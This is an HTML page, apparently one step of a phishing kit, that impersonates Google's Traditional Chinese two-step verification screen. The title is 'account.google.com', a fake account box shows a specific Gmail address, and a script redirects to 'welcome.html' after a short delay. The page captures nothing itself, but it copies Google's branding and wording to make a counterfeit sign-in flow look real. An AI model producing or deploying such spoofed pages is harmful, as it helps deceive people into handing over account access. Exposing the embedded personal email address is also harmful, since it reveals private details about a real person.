<!DOCTYPE html>
<html lang="zh-TW">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>account.google.com</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-image: url('background3.png');
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            margin-top: 200px;
            text-align: left;
        }
        .account-container {
            display: flex;
            align-items: center;
            justify-content: space-between;
            border: 1px solid #ccc;
            border-radius: 20px;
            padding: 10px;
            margin-bottom: 120px;
            background-color: #f1f3f4;
            position: relative;
        }
        .profile-img {
            width: 20px;
            height: 20px;
            border-radius: 50%;
            margin-right: 10px;
        }
        .account-name {
            font-size: 16px;
            color: #333;
            flex-grow: 1;
        }
        .dropdown-icon {
            width: 1px;
            height: 1px;
            border-left: 6px solid transparent;
            border-right: 6px solid transparent;
            border-top: 6px solid black;
            margin-left: 10px;
        }
        .spinner {
            display: none;
            width: 24px;
            height: 24px;
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top-color: #007BFF;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 10px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

    </style>
</head>
<body>
    <div class="container">
        <h1>兩步驟驗證</h1>
        <h4>為保護您的帳戶，Google想確認是<br>您本人正在嘗試登入</h4>
        <div class="account-container">
            <img src="icon1.webp"Profile" class="profile-img">
            <div class="account-name">bill20050201@gmail.com</div>
            <div class="dropdown-icon"></div>
        </div>
        <h3><br><br><br><br><br><br><br>
            <br>查看您的裝置</h3>
        <h4>Google 已將通知傳送到您的<br>「iPhone」。開啟「Gmail」應用程式<br>
            ，接著輕觸提示中的[是]以驗證您的身分</h4>
        <div id="spinner" class="spinner"></div>
        <p id="message"></p>
    </div>
    <script>
        setTimeout(() => {
                window.location.href = "welcome.html"; // 改成你的跳轉目標網址
            }, 2500);
    </script>
</body>
</html>
